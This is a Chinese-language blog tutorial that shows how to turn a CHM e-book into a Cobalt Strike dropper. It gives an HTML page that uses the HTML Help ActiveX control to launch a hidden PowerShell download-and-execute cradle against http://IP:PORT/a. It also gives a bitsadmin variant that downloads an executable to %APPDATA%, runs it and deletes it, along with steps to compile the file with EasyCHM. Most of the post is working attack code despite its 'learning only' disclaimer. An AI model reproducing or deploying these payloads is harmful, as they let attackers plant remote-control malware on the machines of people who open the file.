电子书(chm)-加载JS--CS上线

免责声明:

本文仅做技术交流与学习...

目录

cs--web投递

html(js)代码

html生成chm工具--EasyCHM

[1-选择powershell 模式 生成](#1-选择powershell 模式 生成)

2-选择bitsadmin模式生成

chm反编译成html


cs--web投递

cs配置监听器--->攻击---->web投递--->

端口选择没占用的,

URL路径到时候会在你的服务器自动生成,

选择监听器.

html(js)代码

html 复制代码
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://IP:PORT/a'))">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

生成后的初始命令:

1、powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx/a'))"

2、cmd.exe /c bitsadmin /transfer 0218 http://xxx:xx/a %APPDATA%\0218.exe&%APPDATA%\0218.exe&del %APPDATA%\0218.exe

要注意三个地方:

<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://IP:PORT/a'))">

(1) value值的第一个为逗号

(2)生成的命令带双引号的话就去掉

(3)调用cmd或powershell程序后面要加逗号


html生成chm工具--EasyCHM

生成chm之前提前把html放在一个文件夹里.

--->成功生成chm


1-选择powershell 模式 生成

运行--->


2-选择bitsadmin模式生成

与上面方法一样

--生成payload后--->替换到html中---->编译生成chm---->执行

需要数据传输完成才能上线.


chm反编译成html

hh.exe软件windows自带.

hh.exe -decompile .\\html xxx.chm

相关推荐
前端H14 分钟前
微前端 v3 架构升级:从加载隔离到状态协同
前端·架构·状态模式
hz5678921 分钟前
电子远程评标系统哪家好?安全、合规、易用平台评测指南
安全·云计算·音视频·实时音视频·信息与通信
2301_780303901 小时前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
陆枫Larry1 小时前
小程序包体积优化:用 SVG 图片替换 iconfont,并保留 CSS 控色能力
前端
学逆向的2 小时前
汇编——内存
开发语言·汇编·算法·网络安全
环境栈笔记3 小时前
多账号浏览器选型检查清单:Profile、权限、Session 和任务日志怎么评估
前端·人工智能·后端·自动化
前端炒粉3 小时前
手写promise
java·前端·javascript
LaughingZhu3 小时前
智能体经典范式构建:ReAct、Plan-and-Solve 与 Reflection
前端·react.js·前端框架
jsonbro3 小时前
手把手带你实现发布订阅模式
前端·vue.js·设计模式
一只猫的梦3 小时前
自动化模块 (Automation Module)
前端·chrome